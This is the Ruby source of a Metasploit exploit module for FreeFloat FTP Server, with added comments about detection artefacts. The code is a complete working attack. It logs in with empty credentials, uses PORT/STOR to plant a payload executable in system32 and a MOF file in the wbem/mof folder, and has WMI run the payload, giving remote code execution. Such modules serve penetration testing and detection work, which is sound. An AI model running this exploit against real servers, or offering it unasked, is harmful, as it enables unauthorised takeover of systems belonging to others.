GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/freefloatftp_wbem.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
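# Metasploit module for the FreeFloat FTP Server arbitrary file upload
# (OSVDB 88302 / 88303).
#
# What the code below does on the wire and on disk, as a reference for
# log review and detection engineering:
#   * logs in over FTP with an empty USER and an empty PASS;
#   * issues TYPE I, then PORT (active mode) pointing back at the
#     module's own TCP listener (SRVHOST/SRVPORT), then STOR;
#   * the STOR paths are relative to the server's default directory
#     (C:\ per the module description): one randomly named .exe under
#     WINDOWS/system32 and one randomly named .mof under
#     WINDOWS/system32/wbem/mof, each name 5-14 alphabetic characters;
#   * cleanup is registered for the .exe and for the .mof under
#     wbem\mof\good\, which suggests the MOF is expected to be moved there
#     once processed (inferred from the cleanup path; confirm on target).
# File creation in those two directories by the FTP service process, and
# FTP sessions with empty credentials followed by PORT/STOR, are the
# observable artefacts of this module.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  # Registers module metadata and options.
  #
  # SRVPORT is re-registered with an active-mode description and a default
  # of 8080; FTPUSER and FTPPASS are removed because the login always uses
  # empty strings.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "FreeFloat FTP Server Arbitrary File Upload",
        'Description' => %q{
          This module abuses multiple issues in FreeFloat: 1. No credential is actually
          needed to login; 2. User's default path is in C:\, and this cannot be changed;
          3. User can write to anywhere on the server's file system. As a result of these
          poor implementations, a malicious user can just log in and then upload files,
          and let WMI (Management Instrumentation service) to execute the payload uploaded.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sinn3r', # Vulnerability discovery, Metasploit module
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['OSVDB', '88302'],
          ['OSVDB', '88303']
        ],
        'Platform' => 'win',
        'Targets' => [
          ['FreeFloat', {}]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2012-12-07',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Change the default description so this option makes sense
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
      ]
    )

    deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password
  end

  # Connects, disconnects, and inspects the FTP banner.
  #
  # The result is Detected rather than anything stronger because only the
  # product name in the banner is matched; no version or behaviour is
  # tested here.
  #
  # @return [Exploit::CheckCode] Detected if the banner mentions FreeFloat,
  #   Safe otherwise
  def check
    connect
    disconnect

    # `=~` is kept (instead of match?) so a nil banner yields nil, not an error.
    banner =~ /FreeFloat/ ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe
  end

  # TcpServer callback: serves the data connection the FTP server opens
  # back to this module after a PORT/STOR pair.
  #
  # The first connection receives the executable and advances @stage to
  # :mof; connections while @stage is :mof receive the MOF. The client
  # socket is closed after every connection, whatever the stage.
  #
  # @param cli [Object] the accepted client socket
  def on_client_connect(cli)
    case @stage
    when :exe
      print_status("Sending executable (#{@exe.length} bytes)")
      cli.put(@exe)
      @stage = :mof
    when :mof
      print_status("Sending MOF (#{@mof.length} bytes)")
      cli.put(@mof)
    end

    cli.close
  end

  # Opens a separate FTP control connection, logs in with empty
  # credentials, and asks the server to store +filename+ using active mode.
  #
  # The file content itself is not sent here; it is delivered by
  # on_client_connect when the server connects back to SRVHOST:SRVPORT.
  #
  # @param filename [String] destination path as passed to STOR
  # @return [false, Object] false when the empty login is rejected;
  #   otherwise the value of the final disconnect call
  def upload(filename)
    # Kernel#select with no descriptors and a 1 s timeout: a one-second pause.
    select(nil, nil, nil, 1)

    print_status("Trying to upload #{::File.basename(filename)}")

    # NOTE(review): the first argument is false; presumably this keeps the
    # socket out of the module's shared connection state. Confirm against
    # the Ftp mixin.
    conn = connect(false, datastore['VERBOSE'])

    print_status("Sending empty login...")

    res = send_user("", conn)
    unless res && res =~ /331/
      print_error("Error sending username")
      disconnect(conn) # do not leave the control connection open on failure
      return false
    end

    res = send_pass("", conn)
    unless res && res =~ /230/
      print_error("Error sending password")
      disconnect(conn) # do not leave the control connection open on failure
      return false
    end

    print_good("Empty authentication was successful")

    # Switch to binary mode
    print_status("Set binary mode")
    send_cmd(['TYPE', 'I'], true, conn)

    # Prepare active mode: resolve the listener address and port
    srv_host = datastore['SRVHOST']
    src_ip = srv_host == '0.0.0.0' ? Rex::Socket.source_address : srv_host
    src_port = datastore['SRVPORT'].to_i

    # Prepare active mode: PORT wants "h1,h2,h3,h4,p1,p2" with p1*256+p2 == port
    src_ip = src_ip.tr('.', ',')
    src_port = "#{src_port / 256},#{src_port.remainder(256)}"

    # Set to active mode
    print_status("Set active mode \"#{src_ip},#{src_port}\"")
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

    # Ask the server to fetch the file from the listener; the reply is not awaited
    send_cmd(['STOR', filename], false, conn)

    disconnect(conn)
  end

  # Builds the payload executable and MOF, starts the two uploads on a
  # background thread, and hands control to the parent exploit (the
  # TcpServer side that answers the data connections).
  #
  # Both files are registered for cleanup whether or not the uploads
  # succeeded. The background thread is killed when the parent returns.
  def exploit
    exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10) + 5)}.exe"
    mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
    @exe = generate_payload_exe
    @stage = :exe

    begin
      t = framework.threads.spawn("reqs", false) do
        begin
          # Upload the executable first; the MOF is only attempted if that
          # call returned a truthy value
          u = upload(exe_name)
          upload(mof_name) if u
          register_file_for_cleanup(::File.basename(exe_name))
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
        rescue ::Exception => e
          # NOTE(review): ::Exception is broader than StandardError; left as
          # is because narrowing it would change which failures reach cleanup.
          print_error "Upload Failed: #{e.message}"
          cleanup
        end
      end
      super
    ensure
      # t is nil if spawn itself raised; guard so the original error is not
      # masked by a NoMethodError here
      t.kill if t
    end
  end
end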